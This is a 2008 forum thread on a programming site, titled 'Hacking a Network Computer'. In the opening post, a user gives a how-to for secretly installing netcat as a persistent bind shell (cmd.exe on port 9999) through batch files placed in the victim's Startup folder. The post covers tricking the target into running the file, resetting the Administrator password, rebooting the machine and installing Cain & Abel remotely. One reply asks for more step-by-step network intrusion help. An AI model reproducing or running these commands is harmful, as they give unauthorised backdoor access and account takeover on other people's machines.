It is currently Tue Sep 07, 2010 6:45 am


All times are UTC [ DST ]


Ask on Codemiles community and get answers Free and Fast :

ATM,CSMA,LAN,MAN,WAN,VLAN,ROUTER,HUB
,SWITCH,RING,BUST,TOPOLGY,DSL,VDSL,SDSL,
CABLE,MODEM,FIREWALL,PROXY

Our guest share with us your code snippets , your programming problems , your open source projects ,read articles and post yours .







Post new topic Reply to topic  [ 3 posts ] 
  Print view Previous topic | Next topic 
Author Message
 Post subject: Hacking a Network Computer
PostPosted: Sun Oct 12, 2008 7:12 am 
Offline
Mastermind
User avatar

Joined: Tue Mar 27, 2007 10:55 pm
Posts: 1588
Location: Earth
Has thanked: 10 time
Have thanks: 17 time

As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in:
Code:

Code:
@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe


Save the file as a batch file using Notepad.

The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:
Code:

@echo off cd\ netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:

net user Administrator newpassword

Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:

shutdown -r -t 10 -c "Hello"

the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!

_________________
Currenlty programming with : java , html , php , and javascript .


TOP
 Profile Send private message  
 
| More
 Post subject: Re: Hacking a Network Computer
PostPosted: Thu Mar 05, 2009 2:38 pm 
Offline
Newbie
User avatar

Joined: Thu Mar 05, 2009 2:28 pm
Posts: 2
Has thanked: 0 time
Have thanks: 0 time

its not enough can you please tell without touch other computer how can i access everyting in network please step by step explain.. if possible


TOP
 Profile Send private message  
 
| More
 Post subject: Re: Hacking a Network Computer
PostPosted: Fri Jun 19, 2009 9:32 am 
Offline
Newbie
User avatar

Joined: Fri Jun 19, 2009 9:29 am
Posts: 1
Has thanked: 0 time
Have thanks: 0 time

Thanks for the suggestion, I wish it had worked.


TOP
 Profile Send private message  
 
| More
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 3 posts ] 


 Similar topics
 Topic title   Forum   Author   Replies 
 Sending and playing microphone audio over network  Finished Projects  Casper  3
 Engineer - Network & Systems  INDIA Jobs  poojak  0
 how do to network packet transfering and analyzing in c#  C#  kannan1986  0
 Dissertation topics - Computer Science  General Discussion  jacko123  4
 Computer Virus  General Discussion  tomlee  6

All times are UTC [ DST ]


Who is online

Users browsing this forum: No registered users and 2 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  





Home
General Talks
Finished Projects
Code Library
Games
Tutorials

Java
C/C++
C-sharp
php
Script
JSP/Servlets
Ajax
ASP/ASP.net
Google SEO
Database
Communications
Phpbb3 styles
Photoshop tutorials
Flash tutorials
Find a job






Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
All copyrights reserved to codemiles.com 2007-2009
mileX v1.0 designed by codemiles team